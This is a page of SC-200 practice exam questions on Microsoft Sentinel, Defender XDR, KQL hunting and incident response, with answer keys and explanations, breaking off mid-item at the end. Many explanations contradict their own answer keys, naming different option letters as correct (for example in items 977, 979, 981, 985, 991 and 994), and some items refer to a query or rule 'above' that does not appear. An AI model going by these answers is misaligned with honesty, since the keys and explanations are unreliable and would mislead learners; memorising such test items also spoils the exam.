Microsoft Security Operations Analyst SC-200 (SC-200) — Questions 9761050

1639 questions total · 22pages · All types, answers revealed

Page 13

Page 14 of 22

Page 15
976
MCQeasy

A threat hunter wants to identify all devices that have communicated with a known malicious IP address in the last 7 days. Which table in Microsoft Defender for Endpoint advanced hunting should be queried?

A.DeviceFileEvents
B.DeviceNetworkEvents
C.DeviceProcessEvents
D.DeviceRegistryEvents
AnswerB

This table contains network connection events.

Why this answer

DeviceNetworkEvents records network connections, including destination IP addresses.

977
Multi-Selectmedium

Which TWO of the following are effective techniques for identifying lateral movement in Microsoft Defender for Endpoint advanced hunting? (Choose two.)

Select 2 answers
A.Check for successful logons from public IP addresses
B.Look for large file uploads to cloud storage
C.Search for remote desktop connections from non-administrative workstations
D.Monitor for phishing emails
E.Analyze NTLM authentication events for pass-the-hash
AnswersC, E

Unexpected RDP connections from workstations can indicate lateral movement.

Why this answer

Option A is correct because anomalous RDP connections can indicate lateral movement. Option B is correct because pass-the-hash can be detected via logon events. Option C is wrong because it is about initial access.

Option D is wrong because it is about data exfiltration. Option E is wrong because it is not a lateral movement technique.

978
MCQmedium

You are analyzing a firewall policy in Azure Firewall deployed via Azure Policy. What is the effect of this rule?

A.Allows outbound traffic from any source to IP 10.0.0.5.
B.Allows inbound traffic from IP 10.0.0.5 to any destination.
C.Denies inbound traffic from IP 10.0.0.5 to any destination.
D.Denies outbound traffic from any source to IP 10.0.0.5.
AnswerC

The rule denies inbound traffic from the specified source IP.

Why this answer

Option B is correct because the rule denies inbound traffic from IP 10.0.0.5 to any destination. Option A is wrong because it denies, not allows. Option C is wrong because the direction is inbound.

Option D is wrong because it blocks all traffic from that IP, not just specific ports.

979
Multi-Selecteasy

You are investigating a security incident involving a compromised user account. The attacker used the account to access sensitive data in SharePoint Online. Which TWO actions should you take to remediate the incident? (Choose two.)

Select 2 answers
A.Reset the user's password.
B.Revoke all refresh tokens for the user.
C.Disable the user account in Microsoft Entra ID.
D.Review the sign-in logs to determine the extent of the breach.
E.Create a Conditional Access policy to require MFA for the user.
AnswersB, C

Revoking tokens terminates active sessions.

Why this answer

Option A and D are correct. Disabling the account immediately stops further access. Revoking sessions ensures the attacker's current sessions are terminated.

Option B is wrong because reviewing sign-in logs is investigation, not remediation. Option C is wrong because resetting the password is good but may not kill active sessions without revocation. Option E is wrong because creating a Conditional Access policy is a long-term preventive measure, not immediate remediation.

980
MCQmedium

You are investigating a security incident in Microsoft Sentinel. You need to preserve a snapshot of the investigation including comments, bookmarks, and entities for future reference. What should you do?

A.Create an automation rule to tag the incident
B.Create a bookmark with the relevant data
C.Add the entities to a watchlist
D.Close the incident as a false positive
AnswerB

Bookmarks capture query results, comments, and entities for later use.

Why this answer

Option B is correct because bookmarks in Microsoft Sentinel allow you to preserve a snapshot of an investigation, including comments, bookmarks, and entities, for future reference. Bookmarks capture the state of an investigation at a specific point in time, enabling you to revisit and share the context later.

Exam trap

The trap here is that candidates often confuse bookmarks with watchlists or automation rules, thinking that static data storage or automated actions can preserve an investigation snapshot, but only bookmarks capture the full interactive context including comments and entities.

How to eliminate wrong answers

Option A is wrong because automation rules are used to automate incident response actions (e.g., assigning, changing severity, or triggering playbooks) and do not preserve a snapshot of investigation data like comments and entities. Option C is wrong because watchlists are used to store static data for correlation and matching against events, not to capture a dynamic investigation snapshot with comments and bookmarks. Option D is wrong because closing an incident as a false positive dismisses it without preserving the investigation context; it does not create a persistent record of comments, bookmarks, or entities.

981
Multi-Selecteasy

Which TWO Microsoft Sentinel hunting features can be used to automatically surface suspicious activities without manual query writing?

Select 2 answers
A.Workbooks
B.Analytics rules
C.Livestream
D.Playbooks
E.Hunting queries
AnswersC, E

Real-time hunting by monitoring specific events.

Why this answer

Hunting queries are pre-built queries that run on a schedule. Livestream allows real-time detection of specific events. Option C (Analytics rules) is for detection, not hunting.

Option D (Workbooks) is visualization. Option E (Playbooks) is automation. The correct options are A and B.

982
Multi-Selecteasy

Which TWO are valid KQL operators for performing time-based analysis in threat hunting? (Choose two.)

Select 2 answers
A.project
B.between
C.summarize
D.extend
E.ago()
AnswersB, E

Between filters results within a datetime range.

Why this answer

Option A is correct because 'ago' is used to specify a relative time range. Option B is correct because 'between' is used to filter a column between two datetime values. Option C is wrong because 'extend' creates new columns, not time-based.

Option D is wrong because 'project' selects columns. Option E is wrong because 'summarize' aggregates data.

983
MCQeasy

Your organization uses Microsoft Defender for Office 365. You need to ensure that when a user reports a phishing email, the email is automatically analyzed and remediated. What should you configure?

A.Configure User Reported Message settings to use the built-in reporting tool and automated investigation.
B.Configure Anti-Phish policy to move messages to quarantine.
C.Enable Safe Attachments policy.
D.Enable Safe Links policy.
AnswerA

User reported message settings handle reported emails.

Why this answer

Option C is correct because the User Reported Message settings in Defender for Office 365 allow you to configure what happens when users report messages, including automated investigation and remediation. Option A is wrong because Safe Attachments is for scanning attachments. Option B is wrong because Safe Links is for URL protection.

Option D is wrong because Anti-Phish policies detect phishing but don't handle user reports.

984
MCQhard

You are responsible for Microsoft Sentinel pricing. You notice that data ingestion costs are high due to verbose logs from Windows security events. You need to reduce costs while still collecting critical security events. What should you do?

A.Use Common Event Format (CEF) connector instead of Windows Events
B.Change the table plan to Basic Logs
C.Increase the workspace retention period to archive warm data
D.Configure Windows Security Events via AMA connector with event filtering
AnswerD

Filter logs at source to reduce volume.

Why this answer

Option D is correct because the Azure Monitor Agent (AMA) connector for Windows Security Events allows granular filtering of event IDs and levels, enabling you to collect only critical security events (e.g., 4624, 4625) while excluding verbose logs like Event ID 5156 (Windows Filtering Platform permit connections). This reduces ingestion volume and cost without losing essential security visibility.

Exam trap

The trap here is that candidates confuse 'reducing costs' with 'changing retention' (Option C) or 'using a different connector' (Option A), when the real solution is to filter data at the source using the AMA's event filtering capability, which directly addresses ingestion volume.

How to eliminate wrong answers

Option A is wrong because the Common Event Format (CEF) connector is used for syslog-based appliances (e.g., firewalls, network devices), not for Windows Security Events; it does not reduce costs from Windows event logs. Option B is wrong because changing the table plan to Basic Logs reduces the log retention and query capabilities (no KQL full-text search, limited analytics), which is unsuitable for security events that require advanced hunting and detection rules. Option C is wrong because increasing the workspace retention period to archive warm data actually increases storage costs (warm data is interactive, not archived) and does not reduce ingestion costs; archiving cold data would reduce costs but is not relevant to ingestion volume.

985
MCQhard

You are reviewing a custom hunting query in Microsoft Sentinel. The query above returns results, but you suspect it misses low-frequency beaconing. Which modification improves detection while reducing false positives?

A.Use a sliding window to count distinct connection times per IP per device
B.Group by DeviceName only
C.Decrease the count threshold to 10
D.Add RemotePort to the summarize clause
AnswerA

Better captures regular intervals of beaconing.

Why this answer

Option C is correct because time-bounded connections better detect regular beaconing. Option A increases false positives. Option B only adds columns.

Option D counts per device, missing cross-device patterns.

986
MCQeasy

A threat hunter wants to identify possible data exfiltration over DNS in Microsoft Sentinel. Which KQL function should the analyst use to extract domain names from DNS queries?

A.split
B.parse_url
C.extract_all
D.substring
AnswerB

parse_url parses a URL and returns its components, including host.

Why this answer

Option B is correct because parse_url extracts URL components, including hostname, from a string. Option A is wrong because extract_all is more general for regex. Option C is wrong because split is for splitting strings, not parsing URLs.

Option D is wrong because substring is for simple substring extraction.

987
MCQmedium

In Microsoft 365 Defender, a security analyst reviews an automated investigation that found a potentially unwanted application on multiple devices. The analyst wants to manually approve the suggested remediation action of uninstalling the application. Where should the analyst go?

A.The Action center
B.The Incidents page
C.The Alerts queue
D.The Device inventory
AnswerA

The Action center displays pending and completed actions from automated investigations, allowing analysts to approve or reject them.

Why this answer

The Action center in Microsoft 365 Defender is the centralized location where security analysts can view and manually approve or reject remediation actions that were suggested by automated investigations, such as uninstalling a potentially unwanted application. This is the correct place because the Action center consolidates all pending and completed actions across devices, allowing the analyst to take direct manual intervention on the recommended remediation.

Exam trap

The trap here is that candidates often confuse the Incidents page or Alerts queue as the place to approve remediation actions, not realizing that the Action center is the sole interface for managing pending remediation actions from automated investigations.

How to eliminate wrong answers

Option B is wrong because the Incidents page is used to view and manage the full scope of an incident, including alerts, devices, and evidence, but it does not provide the interface to manually approve or reject specific remediation actions like uninstalling an application. Option C is wrong because the Alerts queue lists individual security alerts, but it does not show the suggested remediation actions from automated investigations; those actions are only visible and actionable in the Action center. Option D is wrong because the Device inventory shows the list of devices and their details, but it does not contain the pending remediation actions or the ability to approve them; it is purely an inventory view.

988
MCQeasy

Your organization uses Microsoft Sentinel to manage security incidents. The security team wants to automatically close low-severity incidents after 24 hours if no activity has occurred. Which feature should you use?

A.Playbooks
B.Automation rules
C.Watchlists
D.Analytics rules
AnswerB

Automation rules can close incidents based on conditions.

Why this answer

Option A is correct because automation rules can automatically close incidents based on conditions like severity and time since last update. Option B is wrong because playbooks are for complex actions, but automation rules are simpler. Option C is wrong because analytics rules generate incidents, they don't close them.

Option D is wrong because watchlists are not used for incident lifecycle.

989
MCQhard

Your SOC uses Microsoft Sentinel and Microsoft Defender for Identity (MDI). You have configured MDI to send alerts to Microsoft 365 Defender. From there, Microsoft Sentinel ingests the alerts via the Microsoft 365 Defender connector. You want to ensure that when MDI detects a suspicious activity, the incident in Microsoft Sentinel is created within 5 minutes. Which factors should you consider?

A.The latency is determined solely by the MDI sensor health and network speed.
B.The incident creation time is controlled by the Microsoft Defender for Cloud Apps connector.
C.The incident will be created within 5 minutes because MDI writes directly to Microsoft Sentinel.
D.The latency depends on the Microsoft 365 Defender connector's polling interval and the analytics rule's frequency.
AnswerD

The connector polls every few minutes, and the analytics rule runs on a schedule.

Why this answer

Option D is correct because the incident creation latency in this architecture depends on two factors: the Microsoft 365 Defender connector's polling interval (which retrieves alerts from Microsoft 365 Defender) and the frequency of the Microsoft Sentinel analytics rule that creates incidents from those ingested alerts. Even if MDI sends alerts quickly to Microsoft 365 Defender, the connector polls at a configurable interval (default every 5 minutes), and the analytics rule runs on its own schedule (typically every 5 minutes). Thus, the total time to incident creation is the sum of these intervals, not a fixed 5 minutes.

Exam trap

The trap here is that candidates assume MDI alerts flow directly into Microsoft Sentinel with minimal delay, overlooking the polling-based Microsoft 365 Defender connector and the scheduled analytics rule that together introduce cumulative latency.

How to eliminate wrong answers

Option A is wrong because latency is not solely determined by MDI sensor health and network speed; the Microsoft 365 Defender connector's polling interval and analytics rule frequency are the primary bottlenecks. Option B is wrong because the Microsoft Defender for Cloud Apps connector is not involved in this alert flow; MDI alerts go to Microsoft 365 Defender, not directly to Defender for Cloud Apps. Option C is wrong because MDI does not write directly to Microsoft Sentinel; alerts flow through Microsoft 365 Defender and the Microsoft 365 Defender connector, which introduces polling and rule processing delays.

990
MCQhard

Your organization uses Microsoft Sentinel with the Microsoft Defender XDR connector. You have a critical incident that involves multiple alerts across different services. The incident is being updated with new alerts. You need to ensure that a specific playbook runs only when the incident severity is updated to High. How should you configure the automation rule?

A.Set the trigger to 'When an alert is created' and filter for alerts with High severity.
B.Set the trigger to 'When incident is updated' and add a condition on severity equals High.
C.Set the trigger to 'When incident is created' and add a condition on severity equals High.
D.Configure the condition inside the playbook to check severity and exit if not High.
AnswerB

This triggers the playbook only when the incident is updated to High severity.

Why this answer

Option B is correct because automation rules can trigger on incident update and filter by severity. Option A is wrong because condition 'when incident is created' would not trigger on update. Option C is wrong because the trigger condition should be on incident update, not alert creation.

Option D is wrong because automation rules are not configured inside playbooks.

991
MCQhard

You deploy the above ASR rule in Microsoft Defender for Endpoint. After deployment, you notice that .exe files are still being executed from Outlook attachments. What is the most likely reason?

A.The rule only applies when the initiating process is outlook.exe, but the attachment may be launched from another process.
B.The rule does not block .vbs files, which are also commonly used in attacks.
C.The ASR rule is configured in audit mode instead of block mode.
D.The rule is not applied because fileExtension is not a supported field in ASR rules.
AnswerC

ASR rules need to be set to 'block' mode to actually block execution; otherwise they only generate audit events.

Why this answer

Option B is correct because ASR rules require the block action to be set to 'block' or 'audit' mode via the tenant's security settings; the policyContent snippet shows the rule definition but does not specify the enforcement mode. The default mode is audit, so the rule only logs events without blocking. Option A is wrong because the rule targets file extensions, not script files.

Option C is wrong because the rule targets initiating process outlook.exe, not all processes. Option D is wrong because the rule is correctly formatted for ASR.

992
MCQmedium

A company uses Microsoft Defender for Cloud to protect an Azure Kubernetes Service (AKS) cluster. The security team wants to receive security alerts about suspicious activities within the cluster, such as a container running with root privileges or attempts to read sensitive host paths. Which Defender for Cloud plan must be enabled to generate these alerts?

A.Defender for Servers
B.Defender for Containers
C.Defender for Cloud Apps
D.Defender for SQL
AnswerB

Defender for Containers provides threat detection and alerts for AKS clusters, including runtime behaviors.

Why this answer

Defender for Containers is the specific plan that provides threat detection for Azure Kubernetes Service (AKS) clusters, including alerts for suspicious activities such as containers running with root privileges or attempts to read sensitive host paths. This plan monitors the Kubernetes control plane and container runtime to generate security alerts based on Kubernetes audit logs and container-specific signals.

Exam trap

The trap here is that candidates often confuse Defender for Servers with container protection because they think containers run on servers, but Defender for Servers does not monitor Kubernetes audit logs or container runtime activities, which are essential for detecting the described alerts.

How to eliminate wrong answers

Option A is wrong because Defender for Servers is designed to protect virtual machines and on-premises servers, not container orchestration platforms like AKS; it does not ingest Kubernetes audit logs or container runtime events. Option C is wrong because Defender for Cloud Apps is a cloud access security broker (CASB) that focuses on SaaS application usage and shadow IT, not on container or Kubernetes-level threats. Option D is wrong because Defender for SQL is dedicated to protecting Azure SQL databases and SQL servers, providing alerts for SQL injection and database anomalies, not for container or Kubernetes security events.

993
MCQhard

A Microsoft Defender XDR incident shows that a user's device has been communicating with a known malicious C2 server. The device is online and the user is actively working. You need to contain the threat with minimal business disruption. What should you do?

A.Remove the device from the network by disabling the switch port
B.Shut down the device remotely
C.Run a full antivirus scan on the device
D.Initiate device isolation from Microsoft Defender XDR
AnswerD

Isolation blocks network traffic except to Microsoft services, minimizing disruption.

Why this answer

Option A is correct because isolating the device stops communication while allowing the user to continue work if they switch to another device. Option B is wrong because shutting down the device causes immediate disruption. Option C is wrong because removing network connectivity may not be possible remotely.

Option D is wrong because running antivirus scan does not stop ongoing C2 communication.

994
MCQeasy

You are responding to an incident where a user's device may be compromised. You need to collect forensic data from the device using Microsoft Defender for Endpoint. Which action should you take?

A.Isolate device
B.Initiate Live Response
C.Collect investigation package
D.Run antivirus scan
AnswerC

Gathers forensic data.

Why this answer

Option B is correct because 'Collect investigation package' gathers forensic data. Option A is wrong because 'Initiate Live Response' is for live remote shell, not just data collection. Option C is wrong because 'Run antivirus scan' is for malware detection.

Option D is wrong because 'Isolate device' is for containment.

995
MCQmedium

You are a security operations analyst at a company that uses Microsoft Sentinel. You have enabled User and Entity Behavior Analytics (UEBA) to detect anomalies. A new alert fires indicating a user is logging in from an unusual location. However, the user is a known traveler. How can you reduce false positives without disabling the UEBA rule?

A.Add the user to the entity behavior analytics exclusion list.
B.Disable the UEBA anomaly rule for unusual locations.
C.Change the alert severity to Informational.
D.Increase the lookback period for the anomaly detection.
AnswerA

Exclusion list prevents alerts for that user while keeping the rule active.

Why this answer

Option A is correct because Microsoft Sentinel's UEBA allows you to add specific users to an entity behavior analytics exclusion list. This prevents the UEBA engine from generating alerts for that user's anomalous activities, such as logins from unusual locations, without disabling the underlying detection rule. This approach maintains detection coverage for other users while suppressing false positives for known travelers.

Exam trap

The trap here is that candidates may think disabling the rule or changing severity is the correct approach, but Microsoft specifically tests the ability to use entity-level exclusions to handle known exceptions without compromising overall detection coverage.

How to eliminate wrong answers

Option B is wrong because disabling the UEBA anomaly rule for unusual locations would stop all alerts for that anomaly type across all users, not just the known traveler, which is an overly broad and disruptive solution. Option C is wrong because changing the alert severity to Informational does not prevent the alert from being generated; it only changes its classification, so false positives would still clutter the security operations queue. Option D is wrong because increasing the lookback period for anomaly detection would make the UEBA model consider older baseline data, potentially making the detection less sensitive to recent changes and not specifically addressing the false positive for a single known traveler.

996
MCQhard

You are investigating a ransomware incident in Microsoft Sentinel. The incident contains multiple alerts from Microsoft Defender for Endpoint, Microsoft Defender for Office 365, and Microsoft Defender for Identity. You need to correlate the alerts and identify the initial entry point. Which KQL function should you use to combine the alerts?

A.materialize()
B.union
C.mv-expand
D.make_set()
AnswerD

make_set() creates an array of unique values, ideal for aggregating alert titles for correlation.

Why this answer

Option D is correct because the make_set function creates an array of unique values from an expression, which is useful for aggregating alert titles. Option A is wrong because materialize is for caching query results. Option B is wrong because the mv-expand operator expands multi-value arrays.

Option C is wrong because the union operator combines tables, not useful for correlating within a single table.

997
MCQmedium

A security analyst is investigating a suspicious email that was reported by a user. The email contains an attachment with a known malicious macro. The analyst wants to find all instances of this same email being delivered to other users in the organization. Which Advanced Hunting table should the analyst query to find the delivery events?

A.EmailAttachmentInfo
B.EmailEvents
C.EmailUrlInfo
D.DeviceFileEvents
AnswerB

Correct. EmailEvents contains the delivery records, including the recipient addresses and delivery status. It can be filtered or joined with attachment data to find all recipients.

Why this answer

The EmailEvents table in Microsoft Defender XDR Advanced Hunting contains records of email delivery events, including sender, recipient, subject, and delivery status. Since the analyst needs to find all instances where the same email (with the malicious macro attachment) was delivered to other users, querying EmailEvents with the email's unique identifier (e.g., NetworkMessageId) will return all delivery events across the organization.

Exam trap

The trap here is that candidates confuse EmailAttachmentInfo (which contains attachment hashes) with EmailEvents, assuming attachment data alone can identify all recipients, but only EmailEvents holds the delivery event records needed to find every user who received the email.

How to eliminate wrong answers

Option A is wrong because EmailAttachmentInfo stores metadata about attachments (e.g., filename, SHA256 hash) but does not include delivery event details like recipient or delivery status; it is used to correlate attachments with emails, not to find delivery instances. Option C is wrong because EmailUrlInfo contains information about URLs in the email body or attachments, not delivery events; it is used for phishing URL investigations, not for locating all recipients of a specific email. Option D is wrong because DeviceFileEvents tracks file creation, modification, and deletion events on endpoints, not email delivery events; it is irrelevant for finding email recipients.

998
MCQmedium

Your organization, Fabrikam, has a hybrid environment with on-premises Active Directory and Microsoft Entra ID. You are using Microsoft Sentinel and Microsoft Defender XDR. You have enabled Microsoft Defender for Identity (MDI) to protect on-premises Active Directory. Recently, you received an incident in Microsoft Sentinel indicating a potential DCSync attack from a domain controller. The incident was generated from an MDI alert. You need to investigate the incident and determine if the attack was successful. You have the following options: A) Use the Microsoft Sentinel incident investigation graph to view entities and relationships. Then query the IdentityDirectoryEvents table for the domain controller to see if any directory replication requests were made. B) Use the Microsoft Defender XDR advanced hunting to query the IdentityLogonEvents table for the domain controller. C) Use the Microsoft Sentinel workbook for MDI to visualize the attack timeline. D) Use the Microsoft Defender for Cloud Apps activity log to review the domain controller's activities. Which option should you choose?

A.Use the Microsoft Sentinel workbook for MDI to visualize the attack timeline.
B.Use the Microsoft Defender XDR advanced hunting to query the IdentityLogonEvents table for the domain controller.
C.Use the Microsoft Sentinel incident investigation graph to view entities and relationships. Then query the IdentityDirectoryEvents table for the domain controller to see if any directory replication requests were made.
D.Use the Microsoft Defender for Cloud Apps activity log to review the domain controller's activities.
AnswerC

The investigation graph helps identify related entities, and IdentityDirectoryEvents contains the necessary replication events.

Why this answer

Option C is correct because a DCSync attack involves an attacker impersonating a domain controller to request directory replication via the MS-DRSR protocol. The IdentityDirectoryEvents table in Microsoft Defender for Identity captures directory service replication activities, including the DirectoryReplication request action. Querying this table for the domain controller allows you to confirm if unauthorized replication requests were made, directly indicating a successful DCSync attack.

Exam trap

The trap here is that candidates may confuse the IdentityLogonEvents table (logon events) with the IdentityDirectoryEvents table (directory service events), or assume a visualization workbook can replace direct querying for forensic evidence of a DCSync attack.

How to eliminate wrong answers

Option A is wrong because the Microsoft Sentinel workbook for MDI provides visualizations and timelines but does not allow direct querying of the IdentityDirectoryEvents table to confirm specific replication requests; it is a reporting tool, not an investigative query tool. Option B is wrong because the IdentityLogonEvents table tracks authentication events (logons), not directory replication activities; DCSync attacks are not logon events but directory service replication requests. Option D is wrong because Microsoft Defender for Cloud Apps activity log focuses on cloud application activities, not on-premises Active Directory replication events; it would not capture MS-DRSR replication requests from a domain controller.

999
MCQhard

Your organization uses Microsoft Sentinel with a Log Analytics workspace in the East US region. You have deployed the Microsoft Defender for Cloud connector. You notice that security alerts from Defender for Cloud are not appearing as incidents in Sentinel. You have confirmed that the connector is enabled and data is flowing. What is the most likely cause?

A.The Sentinel workspace does not have required permissions to create incidents.
B.There is a delay in incident creation; wait for 24 hours.
C.You need to create an analytics rule with a rule template that uses the SecurityAlert table.
D.The Microsoft Defender for Cloud connector is not properly configured.
AnswerC

Sentinel requires analytics rules to generate incidents from incoming alerts. The connector only ingests the alerts.

Why this answer

Option C is correct because analytics rules must be created to generate incidents from alerts. Option A is wrong because the connector is working. Option B is wrong because incident creation is not automatic from the connector alone.

Option D is wrong because permissions are not the issue if data is flowing.

1000
MCQmedium

A security analyst in Microsoft Sentinel is creating a scheduled analytics rule to detect multiple failed logon attempts from the same source IP address. The rule should generate an incident only when the count of failed logons exceeds 10 within a 5-minute window. Which configuration setting is essential to limit the incident generation to this threshold?

A.Event grouping set to 'Group all events into a single alert'
B.Alert threshold set to a value of 10
C.Query scheduling set to run every 5 minutes
D.Entity mapping for source IP address
AnswerB

The alert threshold specifies the minimum number of query results needed to generate an incident, ensuring only high-count patterns trigger alerts.

Why this answer

The alert threshold setting in a Microsoft Sentinel scheduled analytics rule directly controls the minimum number of query results required to generate an incident. By setting the threshold to 10, the rule will only fire when the query returns more than 10 failed logon events within the 5-minute window, matching the requirement exactly.

Exam trap

The trap here is confusing the alert threshold with query scheduling or event grouping, leading candidates to think that setting the run interval to 5 minutes alone ensures the threshold is met, when in fact the threshold is a separate mandatory configuration.

How to eliminate wrong answers

Option A is wrong because 'Group all events into a single alert' controls how matching events are bundled into one alert, not the count threshold for triggering an incident. Option C is wrong because query scheduling set to run every 5 minutes defines the evaluation frequency, not the threshold for the number of failed logons. Option D is wrong because entity mapping for source IP address is used to enrich alerts with entity information for investigation, not to limit incident generation based on event count.

1001
Matchingmedium

Match each incident severity level to its description in Microsoft 365 Defender.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

No impact, but may indicate an issue

Minimal impact, likely false positive

Potential impact, requires investigation

Significant impact, immediate action needed

Widespread impact, urgent response required

Why these pairings

Severity levels help prioritize incident response.

1002
MCQhard

Your company uses Microsoft Sentinel and has enabled the Microsoft Defender XDR connector. You notice that incidents from Microsoft Defender for Cloud Apps are not appearing in Microsoft Sentinel. All other Defender XDR incidents appear correctly. What is the most likely cause?

A.The security operations team does not have the appropriate permissions.
B.The Microsoft Defender XDR connector only ingests incidents from Microsoft Defender for Endpoint.
C.The Microsoft 365 E5 license is not assigned to the users.
D.The Microsoft Defender for Cloud Apps data connector is not enabled in Microsoft Sentinel.
AnswerD

You need to enable the Microsoft Defender for Cloud Apps connector separately to ingest its incidents.

Why this answer

Microsoft Defender for Cloud Apps incidents are ingested into Microsoft Sentinel via the Microsoft Defender XDR connector, but only if the data connector for Microsoft Defender for Cloud Apps is also enabled separately in Sentinel. Option A is correct. Option B is wrong because license requirements are for other connectors.

Option C is wrong because roles are not the issue. Option D is wrong because the connector is for Defender XDR, not for Cloud Apps specifically.

1003
Multi-Selectmedium

Which TWO actions should you take to optimize cost in Microsoft Sentinel while maintaining security coverage? (Choose two.)

Select 2 answers
A.Enable continuous export for all tables.
B.Purchase a Pay-as-you-go commitment tier.
C.Adjust the interactive retention period for tables that don't need long-term interactive access.
D.Add more tables to ingest data.
E.Use Basic Logs for high-volume, low-value data sources.
AnswersC, E

Reduces storage cost.

Why this answer

Option C is correct because reducing interactive retention for tables that do not require long-term, fast query access directly lowers storage costs. Microsoft Sentinel charges per GB for data stored in the interactive retention tier, while data moved to long-term retention (up to 12 years) is significantly cheaper. By tailoring retention periods to actual operational needs, you avoid paying premium rates for data that is rarely queried interactively.

Exam trap

The trap here is that candidates often confuse 'commitment tiers' (which reduce per-GB cost) with a direct cost-optimization action, but the question asks for specific actions you take, not pricing models; also, 'continuous export' sounds like a way to offload data, but it actually adds cost and complexity unless used for a specific purpose.

1004
MCQhard

A large enterprise uses Microsoft Defender for Cloud with the integrated Microsoft Defender Vulnerability Management solution enabled for all servers. The security team wants to identify all virtual machines that have not been scanned for vulnerabilities in the last 7 days. They plan to use Azure Resource Graph (ARG) to generate a report. Which KQL query would correctly identify these machines?

A.securityresources | where type =~ 'microsoft.security/assessments' and name == '4da3e7e8-0e4b-4c5e-8e0a-7e8f4e8e4e8e' | where properties.status.code == 'Unhealthy' and properties.status.firstEvaluationDate < ago(7d)
B.resources | where type =~ 'microsoft.compute/virtualmachines' | where properties.storageProfile.osDisk.managedDisk.id != ''
C.securityresources | where type =~ 'microsoft.security/regulatorycompliancestandards'
D.resources | where type =~ 'microsoft.security/securitystatuses'
AnswerA

This query filters for the specific vulnerability assessment and checks if the last scan (firstEvaluationDate) is older than 7 days or not present.

Why this answer

Option A is correct because it queries the `securityresources` table for the specific vulnerability assessment type (`microsoft.security/assessments`) and filters for the vulnerability assessment result named with the GUID `4da3e7e8-0e4b-4c5e-8e0a-7e8f4e8e4e8e`, which corresponds to the 'Vulnerabilities in your virtual machines should be remediated' assessment. It then checks that the status code is 'Unhealthy' (indicating vulnerabilities were found) and that the `firstEvaluationDate` is older than 7 days, which identifies machines that have not been scanned recently.

Exam trap

The trap here is that candidates often confuse the `firstEvaluationDate` with the last scan time, but in this context, an outdated `firstEvaluationDate` on an 'Unhealthy' assessment correctly identifies machines that have not been rescanned recently, whereas a healthy assessment would have been updated more frequently.

How to eliminate wrong answers

Option B is wrong because it queries the `resources` table for virtual machines with a managed disk, which does not relate to vulnerability scanning recency at all. Option C is wrong because it queries `microsoft.security/regulatorycompliancestandards`, which tracks compliance with regulatory standards (e.g., ISO, NIST) and not vulnerability scan status. Option D is wrong because `microsoft.security/securitystatuses` is a deprecated table that does not contain vulnerability assessment scan timestamps or the specific assessment results needed for this query.

1005
MCQmedium

A SOC analyst is configuring an analytics rule in Microsoft Sentinel. The rule should run every hour and check for sign-ins from users who have been inactive for more than 30 days. The analyst uses the SigninLogs and IdentityInfo tables. Which KQL query pattern should be used to identify these users?

A.union IdentityInfo, SigninLogs | where TimeGenerated > ago(30d) | summarize by UserPrincipalName
B.IdentityInfo | join kind=leftanti (SigninLogs | where TimeGenerated > ago(30d)) on UserPrincipalName
C.SigninLogs | where TimeGenerated > ago(30d) | summarize by UserPrincipalName | join kind=rightanti IdentityInfo on UserPrincipalName
D.SigninLogs | where TimeGenerated < ago(30d) | summarize by UserPrincipalName
AnswerB

Correct. The left anti join returns all rows from IdentityInfo that do not have a matching UserPrincipalName in the recent SigninLogs, effectively finding inactive users.

Why this answer

Option B is correct because it uses a `leftanti` join to return all rows from the `IdentityInfo` table that have no matching `UserPrincipalName` in the `SigninLogs` table for the last 30 days. This directly identifies users who are in the identity inventory but have not signed in within the past 30 days, which is the exact requirement for detecting inactive users.

Exam trap

The trap here is that candidates often confuse `leftanti` with `rightanti` or `leftouter` joins, mistakenly thinking that summarizing sign-ins first and then joining will correctly identify inactive users, when in fact the direction of the anti-join determines which table's unmatched rows are returned.

How to eliminate wrong answers

Option A is wrong because it uses `union` to combine the two tables and then filters for sign-ins within 30 days, which would include all users who have signed in recently and miss the inactive users entirely. Option C is wrong because it uses a `rightanti` join, which returns rows from the right table (`IdentityInfo`) that have no match in the left table (`SigninLogs`), but the query first summarizes sign-ins from the last 30 days, so the join would incorrectly return users who have signed in recently as inactive. Option D is wrong because it filters `SigninLogs` for sign-ins older than 30 days (`TimeGenerated < ago(30d)`), which would return historical sign-ins rather than identifying users with no recent sign-ins at all.

1006
MCQmedium

You are responding to a phishing incident. The investigation reveals that a user clicked a link in a phishing email and entered credentials on a fake site. You need to contain the incident and prevent further compromise. What should you do first?

A.Report the phishing site to Microsoft.
B.Block the phishing URL in Microsoft Defender for Office 365.
C.Reset the user's password and revoke sessions.
D.Delete the phishing email from the user's mailbox.
AnswerC

This invalidates the stolen credentials and existing sessions.

Why this answer

Option D is correct because resetting the compromised user password immediately prevents further access using stolen credentials. Option A is wrong because blocking the URL does not invalidate already stolen credentials. Option B is wrong because deleting the email from the user's mailbox does not prevent use of stolen credentials.

Option C is wrong because reporting the site to Microsoft is reactive.

1007
MCQmedium

Your Microsoft 365 tenant is protected by Microsoft Defender for Office 365. A user reports receiving a suspicious email with a link. You need to investigate whether the link was malicious and if any other users clicked it. Which tool should you use first?

A.Microsoft Entra ID sign-in logs
B.Microsoft Purview compliance portal
C.Email Entity page in Microsoft Defender XDR
D.Threat Explorer
E.Attack Simulation Training
AnswerD

Provides detailed email threat data including URL clicks.

Why this answer

Threat Explorer allows investigation of email threats, including URLs and user clicks. The others are for other purposes.

1008
MCQmedium

A SOC analyst wants to automate a response in Microsoft Sentinel: whenever an incident is created that contains a compromised user entity (e.g., a user whose credentials were used in a breach), a playbook should run to disable that user in Microsoft Entra ID. Which condition should be configured in the automation rule to trigger this playbook?

A.Set the trigger to 'When incident is created' with no additional condition.
B.Set the condition to 'When incident is created with entity type IP'.
C.Set the condition to 'When incident is created with entity type Account'.
D.Set the condition to 'When incident is updated with entity type Host'.
AnswerC

The Account entity type represents user accounts. This condition ensures the playbook runs only on incidents that include a user entity, which is appropriate for disabling a compromised user.

Why this answer

Option C is correct because the automation rule must trigger when an incident is created with an entity type of 'Account' to match the compromised user entity. In Microsoft Sentinel, a user whose credentials were used in a breach is represented as an 'Account' entity, not an 'IP' or 'Host'. The playbook to disable the user in Microsoft Entra ID requires this entity type to pass the user principal name (UPN) or object ID to the action.

Exam trap

The trap here is that candidates often confuse 'Account' with 'User' or assume 'IP' is sufficient for user compromise, but Microsoft Sentinel uses the specific entity type 'Account' for user identities, and the automation rule condition must match exactly that type to trigger the playbook correctly.

How to eliminate wrong answers

